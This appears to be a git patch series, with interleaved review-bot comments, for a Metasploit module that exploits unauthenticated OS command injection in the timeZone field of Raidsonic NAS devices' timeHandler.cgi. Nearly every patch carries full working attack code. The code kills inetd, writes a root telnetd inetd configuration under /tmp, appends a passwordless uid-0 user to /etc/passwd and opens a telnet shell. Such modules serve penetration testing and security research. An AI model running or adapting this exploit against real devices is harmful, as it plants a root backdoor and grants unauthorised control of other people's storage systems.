@@ -179,19 +164,19 @@ class Metasploit3 < Msf::Exploit::Remote #not working without setting encode_params to false! 'encode_params' => false, 'vars_post' => { - "month" => "#{rand(12)}", - "date" => "#{rand(30)}", - "year" => "20#{rand(99)}", - "hour" => "#{rand(12)}", - "minute" => "#{rand(60)}", - "ampm" => "PM", - "timeZone" => "Amsterdam`#{cmd}`", - "ntp_type" => "default", - "ntpServer" => "none", - "old_date" => " 1 12007", - "old_time" => "1210", + "month" => "#{rand(12)}", + "date" => "#{rand(30)}", + "year" => "20#{rand(99)}", + "hour" => "#{rand(12)}", + "minute" => "#{rand(60)}", + "ampm" => "PM", + "timeZone" => "Amsterdam`#{cmd}`", + "ntp_type" => "default", + "ntpServer" => "none", + "old_date" => " 1 12007", + "old_time" => "1210", "old_timeZone" => "Amsterdam", - "renew" => "0" + "renew" => "0" } }) return res From 5fc806e3e070230dd3f924e4b6e78f6c64ce0989 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sun, 18 Aug 2013 16:18:27 +0200 Subject: [PATCH 09/14] little fixes --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 51 ++----------------- 1 file changed, 4 insertions(+), 47 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 3a2d5b3dab..561901e60a 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -76,24 +76,12 @@ class Metasploit3 < Msf::Exploit::Remote def banner_timeout (datastore['TelnetBannerTimeout'] || 25).to_i -<<<<<<< HEAD - end - - def exploit - @response_pattern = "\>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 end def exploit telnet_port = rand(65535) -<<<<<<< HEAD - print_status("#{rhost}:#{rport} - Telnetport: #{telnetport}") -======= print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}") ->>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 #first request cmd = "killall inetd" 
@@ -131,10 +119,10 @@ class Metasploit3 < Msf::Exploit::Remote end #fourth request - user = rand_text_alpha(6) - cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd" + @user = rand_text_alpha(6) + cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd" cmd = Rex::Text.uri_encode(cmd) - print_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") + print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -143,31 +131,13 @@ class Metasploit3 < Msf::Exploit::Remote end begin print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") -<<<<<<< HEAD - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) -======= sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i }) ->>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end -<<<<<<< HEAD - print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" - auth_info = { - :host => rhost, - :port => telnetport, - :sname => 'telnet', - :user => user, - :pass => "", - :source_type => "exploit", - :active => true - } - report_auth_info(auth_info) -======= print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") ->>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 prompt = negotiate_telnet(sock) if prompt.nil? sock.close @@ -176,11 +146,6 @@ class Metasploit3 < Msf::Exploit::Remote print_good("#{rhost}:#{rport} - Telnet session successfully established...") end -<<<<<<< HEAD - sock.put(user) - sock.put("\r\n") -======= ->>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 handler(sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") 
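Review bot: Promoting `user` to `@user` so that `negotiate_telnet` can read it fixes the scoping error but introduces hidden coupling: the instance variable is set midway through `exploit` and read in another method with no indication of the dependency at either site. Passing it explicitly, `negotiate_telnet(sock, user)`, keeps the data flow visible; if the instance variable stays, a short comment at the assignment (`# read by negotiate_telnet`) would at least mark it. The enclosing exploit method begins and ends outside this hunk.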
@@ -219,30 +184,22 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") end end -<<<<<<< HEAD - def negotiate_telnet(sock) -======= def negotiate_telnet(sock) login = read_telnet(sock, "login: $") if login - sock.put("#{user}\r\n") + sock.put("#{@user}\r\n") end return read_telnet(sock, "> $") end def read_telnet(sock, pattern) ->>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 begin Timeout.timeout(banner_timeout) do while(true) data = sock.get_once(-1, tel_timeout) return nil if not data or data.length == 0 -<<<<<<< HEAD - if data =~ /login/ -======= if data =~ /#{pattern}/ ->>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 return true end end From c902b0ea4b2040d7a924d33feaf3f217723f6e6a Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 19 Aug 2013 18:07:11 +0200 Subject: [PATCH 10/14] removed user and pass option --- .../linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 7 ------- 1 file changed, 7 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 561901e60a..bff2e93ba2 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -56,13 +56,6 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0 )) - register_options( - [ - OptString.new('USERNAME',[ true, 'User to login with', 'admin']), - OptString.new('PASSWORD',[ false, 'Password to login with', 'admin']), - - ], self.class) - register_advanced_options( [ OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), From 62cf9cb07cb9c4779f3c8dec6a0e801e82e20390 Mon Sep 17 00:00:00 2001 
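Review bot: `read_telnet` keeps the pre-merge loop shape — `while(true)` with `return nil if not data or data.length == 0` — where idiomatic Ruby would be `loop do` and `return nil if data.nil? || data.empty?` (`not`/`or` have low precedence and read differently from `!`/`||`). The interpolated `/#{pattern}/` treats the caller's string as regex source rather than a literal; that is fine for the two fixed prompts passed here, but a comment such as `# pattern is regex source, not a literal string` would stop a future caller from passing untrusted text into it. `negotiate_telnet` also depends on `@user` having been set by `exploit`; if it is nil the login line sent is empty, so documenting that precondition on the method would help.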
From: jvazquez-r7 Date: Mon, 16 Sep 2013 09:09:16 -0500 Subject: [PATCH 11/14] Retab changes for PR #2188 --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 338 +++++++++--------- 1 file changed, 169 insertions(+), 169 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index bff2e93ba2..9b8a56343b 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb 
@@ -8,197 +8,197 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = ExcellentRanking - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::CommandShell - include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::CommandShell + include Msf::Exploit::FileDropper - RESPONSE_PATTERN = "\ 'Raidsonic NAS Devices Unauthenticated Remote Command Execution', - 'Description' => %q{ - Different Raidsonic NAS devices are vulnerable to OS command injection via the web - interface. The vulnerability exists in timeHandler.cgi, which is accessible without - authentication. This module has been tested with the versions IB-NAS5220 and - IB-NAS4220. - }, - 'Author' => - [ - 'Michael Messner ', # Vulnerability discovery and Metasploit module - 'juan vazquez' # minor help with msf module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'OSVDB', '90221' ], - [ 'EDB', '24499' ], - [ 'BID', '57958' ], - [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-010' ] - ], - 'DisclosureDate' => 'Feb 04 2013', - 'Privileged' => true, - 'Platform' => ['linux','unix'], - 'Payload' => - { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', - }, - }, - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0 - )) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Raidsonic NAS Devices Unauthenticated Remote Command Execution', + 'Description' => %q{ + Different Raidsonic NAS devices are vulnerable to OS command injection via the web + interface. The vulnerability exists in timeHandler.cgi, which is accessible without + authentication. This module has been tested with the versions IB-NAS5220 and + IB-NAS4220. 
+ }, + 'Author' => + [ + 'Michael Messner ', # Vulnerability discovery and Metasploit module + 'juan vazquez' # minor help with msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'OSVDB', '90221' ], + [ 'EDB', '24499' ], + [ 'BID', '57958' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-010' ] + ], + 'DisclosureDate' => 'Feb 04 2013', + 'Privileged' => true, + 'Platform' => ['linux','unix'], + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0 + )) - register_advanced_options( - [ - OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), - OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) - ], self.class) - end + register_advanced_options( + [ + OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), + OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) + ], self.class) + end - def tel_timeout - (datastore['TelnetTimeout'] || 10).to_i - end + def tel_timeout + (datastore['TelnetTimeout'] || 10).to_i + end - def banner_timeout - (datastore['TelnetBannerTimeout'] || 25).to_i - end + def banner_timeout + (datastore['TelnetBannerTimeout'] || 25).to_i + end - def exploit - telnet_port = rand(65535) + def exploit + telnet_port = rand(65535) - print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}") + print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}") - #first request - cmd = "killall inetd" - cmd = Rex::Text.uri_encode(cmd) - print_status("#{rhost}:#{rport} - sending first request - killing inetd") + #first request + cmd = "killall inetd" + cmd = Rex::Text.uri_encode(cmd) + print_status("#{rhost}:#{rport} - sending first request - killing 
inetd") - res = request(cmd) - #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") - end + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end - #second request - inetd_cfg = rand_text_alpha(8) - cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" - cmd = Rex::Text.uri_encode(cmd) - print_status("#{rhost}:#{rport} - sending second request - configure inetd") - register_file_for_cleanup("/tmp/#{inetd_cfg}") + #second request + inetd_cfg = rand_text_alpha(8) + cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" + cmd = Rex::Text.uri_encode(cmd) + print_status("#{rhost}:#{rport} - sending second request - configure inetd") + register_file_for_cleanup("/tmp/#{inetd_cfg}") - res = request(cmd) - #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") - end + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end - #third request - cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" - cmd = Rex::Text.uri_encode(cmd) - print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") + #third request + cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" + cmd = Rex::Text.uri_encode(cmd) 
+ print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") - res = request(cmd) - #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") - end + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end - #fourth request - @user = rand_text_alpha(6) - cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd" - cmd = Rex::Text.uri_encode(cmd) - print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}") + #fourth request + @user = rand_text_alpha(6) + cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd" + cmd = Rex::Text.uri_encode(cmd) + print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}") - res = request(cmd) - #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") - end - begin - print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i }) + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end + begin + print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i }) - if sock.nil? 
- fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") - end + if sock.nil? + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") + end - print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") - prompt = negotiate_telnet(sock) - if prompt.nil? - sock.close - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") - else - print_good("#{rhost}:#{rport} - Telnet session successfully established...") - end + print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") + prompt = negotiate_telnet(sock) + if prompt.nil? + sock.close + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") + else + print_good("#{rhost}:#{rport} - Telnet session successfully established...") + end - handler(sock) - rescue - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") - end - return - end + handler(sock) + rescue + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") + end + return + end - def request(cmd) + def request(cmd) - uri = '/cgi/time/timeHandler.cgi' + uri = '/cgi/time/timeHandler.cgi' - begin - res = send_request_cgi({ - 'uri' => uri, - 'method' => 'POST', - #not working without setting encode_params to false! 
- 'encode_params' => false, - 'vars_post' => { - "month" => "#{rand(12)}", - "date" => "#{rand(30)}", - "year" => "20#{rand(99)}", - "hour" => "#{rand(12)}", - "minute" => "#{rand(60)}", - "ampm" => "PM", - "timeZone" => "Amsterdam`#{cmd}`", - "ntp_type" => "default", - "ntpServer" => "none", - "old_date" => " 1 12007", - "old_time" => "1210", - "old_timeZone" => "Amsterdam", - "renew" => "0" - } - }) - return res - rescue ::Rex::ConnectionError - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") - end - end + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + #not working without setting encode_params to false! + 'encode_params' => false, + 'vars_post' => { + "month" => "#{rand(12)}", + "date" => "#{rand(30)}", + "year" => "20#{rand(99)}", + "hour" => "#{rand(12)}", + "minute" => "#{rand(60)}", + "ampm" => "PM", + "timeZone" => "Amsterdam`#{cmd}`", + "ntp_type" => "default", + "ntpServer" => "none", + "old_date" => " 1 12007", + "old_time" => "1210", + "old_timeZone" => "Amsterdam", + "renew" => "0" + } + }) + return res + rescue ::Rex::ConnectionError + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + end + end - def negotiate_telnet(sock) - login = read_telnet(sock, "login: $") - if login - sock.put("#{@user}\r\n") - end - return read_telnet(sock, "> $") - end + def negotiate_telnet(sock) + login = read_telnet(sock, "login: $") + if login + sock.put("#{@user}\r\n") + end + return read_telnet(sock, "> $") + end - def read_telnet(sock, pattern) - begin - Timeout.timeout(banner_timeout) do - while(true) - data = sock.get_once(-1, tel_timeout) - return nil if not data or data.length == 0 - if data =~ /#{pattern}/ - return true - end - end - end - rescue ::Timeout::Error - return nil - end - end + def read_telnet(sock, pattern) + begin + Timeout.timeout(banner_timeout) do + while(true) + data = sock.get_once(-1, tel_timeout) + return nil if not data or 
data.length == 0 + if data =~ /#{pattern}/ + return true + end + end + end + rescue ::Timeout::Error + return nil + end + end end From 86e5163cada8218ff4fee3637127497fc7b129ce Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 16 Sep 2013 09:19:26 -0500 Subject: [PATCH 12/14] Fix Indentation and cleanup --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 41 +++++++++---------- 1 file changed, 19 insertions(+), 22 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 9b8a56343b..19f35eedde 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = ManualRanking # It's backdooring the remote device include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CommandShell @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Feb 04 2013', 'Privileged' => true, - 'Platform' => ['linux','unix'], + 'Platform' => 'unix', 'Payload' => { 'Compat' => { @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DefaultTarget' => 0 )) 
@@ -92,13 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote
  cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
  cmd = Rex::Text.uri_encode(cmd)
  print_status("#{rhost}:#{rport} - sending second request - configure inetd")
- register_file_for_cleanup("/tmp/#{inetd_cfg}")
  res = request(cmd)
  #no server header or something that we could use to get sure the command is executed
  if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
  fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
  end
+ register_file_for_cleanup("/tmp/#{inetd_cfg}")
  #third request
  cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}"
@@ -122,28 +122,25 @@ class Metasploit3 < Msf::Exploit::Remote
  if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
  fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
  end
- begin
- print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
- sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i })
- if sock.nil?
- fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
- end
+ print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
+ sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i })
- print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
- prompt = negotiate_telnet(sock)
- if prompt.nil?
- sock.close
- fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
- else
- print_good("#{rhost}:#{rport} - Telnet session successfully established...")
- end
-
- handler(sock)
- rescue
+ if sock.nil?
  fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
  end
- return
+
+ print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
+ prompt = negotiate_telnet(sock)
+ if prompt.nil?
+ sock.close
+ fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
+ else
+ print_good("#{rhost}:#{rport} - Telnet session successfully established...")
+ end
+
+ handler(sock)
+
  end
  def request(cmd)
From 926ddf35bc2b1505fa430edd98a454827ce4318f Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 19 Sep 2013 08:23:25 -0500
Subject: [PATCH 13/14] Fix possible collisions on binding port and handle rex socket
---
 .../linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)
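Review bot: With the `begin`/`rescue` gone, the `Rex::Socket.create_tcp` call at the top of the new block has no error handling: as far as I know `create_tcp` raises `Rex::ConnectionError` subclasses (refused, timeout, unreachable) rather than returning nil, so the following `if sock.nil?` check is likely unreachable and a refused connection now surfaces as an uncaught exception instead of a `fail_with`. `request` in the same file already handles this case with `rescue ::Rex::ConnectionError`, so for consistency the connect alone should be wrapped the same way, keeping the specific message the old bare `rescue` used to swallow. The enclosing `exploit` method starts outside the hunk.
```ruby
    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
    begin
      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i })
    rescue ::Rex::ConnectionError => e
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned: #{e.message}")
    end
    # … unchanged: sock.nil? check, negotiate_telnet and handler(sock) …
```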
diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
index 19f35eedde..ea03679036 100644
--- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
+++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
  end
  def exploit
- telnet_port = rand(65535)
+ telnet_port = rand(32767) + 32768
  print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}")
@@ -124,12 +124,15 @@ class Metasploit3 < Msf::Exploit::Remote
  end
  print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
- sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i })
+ ctx = { 'Msf' => framework, 'MsfExploit' => self }
+ sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i, 'Context' => ctx })
  if sock.nil?
  fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
  end
+ add_socket(sock)
+
  print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
  prompt = negotiate_telnet(sock)
  if prompt.nil?
From 71d74655f9375e6a0822d4778473cc73afe7fa7f Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Mon, 23 Sep 2013 11:44:04 -0500
Subject: [PATCH 14/14] Modify description
---
 .../exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
index ea03679036..24333eec45 100644
--- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
+++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
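Review bot: `telnet_port = rand(32767) + 32768` confines the listener to 32768–65534, which on most Linux kernels is also the default ephemeral source-port range, so a clash with an outbound connection's source port on the device remains possible, only less likely than with `rand(65535)`; the later `if sock.nil?` path is the only signal and it cannot distinguish "inetd failed to bind" from "telnetd never started". A short comment recording that trade-off, e.g. `# high port to avoid the device's own listeners; ephemeral-port collisions are still possible`, would help the next reader. In the second hunk `telnet_port` is now always an Integer, so the `.to_i` in the `create_tcp` call is redundant and `'PeerPort' => telnet_port` reads more plainly. `exploit` continues outside both hunks.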
@@ -23,7 +23,8 @@ class Metasploit3 < Msf::Exploit::Remote
  Different Raidsonic NAS devices are vulnerable to OS command injection via the web
  interface. The vulnerability exists in timeHandler.cgi, which is accessible without
  authentication. This module has been tested with the versions IB-NAS5220 and
- IB-NAS4220.
+ IB-NAS4220. Since this module is adding a new user and modifying the inetd daemon
+ configuration, users should use this module at his own risk.
  },
  'Author' =>
  [
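Review bot: The added sentence has a grammar slip and stays vague about what actually persists: `users should use this module at his own risk` should read `at their own risk`, and since the point of the warning is cleanup, naming the concrete residue — a passwordless uid-0 entry appended to /etc/passwd, an inetd configuration under /tmp and a telnetd listener on a random high port — tells operators and defenders exactly what to remove or look for after a run. Suggested wording: `IB-NAS4220. This module appends a new root-level user to /etc/passwd and starts telnetd through a fresh inetd configuration; neither is reverted automatically, so use it at your own risk.` The /tmp file is registered with FileDropper elsewhere in the module, so the passwd entry and the running services are what remain.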